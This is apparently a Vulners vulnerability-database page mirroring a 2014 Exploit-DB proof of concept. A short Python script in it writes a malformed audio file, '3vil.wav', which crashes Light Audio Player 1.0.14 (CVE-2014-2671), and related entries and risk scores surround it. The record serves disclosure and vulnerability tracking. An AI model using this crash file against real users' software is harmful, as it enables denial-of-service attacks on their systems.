Lucene search
+L

Light Audio Player 1.0.14 - Memory Corruption (PoC)

🗓️ 24 Mar 2014 00:00:00Reported by TUNISIAN CYBERType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 31 Views

Light Audio Player 1.0.14 Memory Corruption PoC - DoS/PoC WinXp/Windows 7 Pro Memory Corruption Exploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2014-2671
1 Jul 201300:00
circl
cve
CVE
CVE-2014-2671
30 Mar 201410:00
cve
cvelist
Cvelist
CVE-2014-2671
30 Mar 201410:00
cvelist
exploitdb
Exploit DB
Microsoft PowerPoint 2007 - Crash (PoC)
1 Jul 201300:00
exploitdb
exploitdb
Exploit DB
Microsoft Windows Movie Maker 2.1.4026.0 - '.wav' Crash (PoC)
18 Jul 201300:00
exploitdb
exploitdb
Exploit DB
Microsoft Windows Media Player 11.0.5721.5230 - Memory Corruption (PoC)
24 Mar 201400:00
exploitdb
exploitdb
Exploit DB
jetVideo 8.1.1 - Basic '.wav' Local Crash (PoC)
24 Mar 201400:00
exploitdb
exploitdb
Exploit DB
GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption (PoC)
24 Mar 201400:00
exploitdb
exploitdb
Exploit DB
GOM Video Converter 1.1.0.60 - '.wav' Memory Corruption (PoC)
24 Mar 201400:00
exploitdb
nvd
NVD
CVE-2014-2671
31 Mar 201414:58
nvd
Rows per page
#!/usr/bin/python

#[+] Author: TUNISIAN CYBER
#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
#[+] Date: 22-03-2014
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows 7 Pro
#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
#[+] Friendly Sites: na3il.com,th3-creative.com
#[+] Twitter: @TCYB3R

import os
os.system("color 02")

print"###########################################################"
print"#  Title: Light Audio Player 1.0.14 Memory Corruption PoC  #"
print"#  Author: TUNISIAN CYBER                                  #"
print"#  Category: DoS/PoC                                       # "
print"###########################################################"

header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")

filename = "3vil.wav"
file = open(filename , "w")
file.write(header)
print "\n Files Created!\n"
file.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Mar 2014 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 26.8
EPSS0.46291
31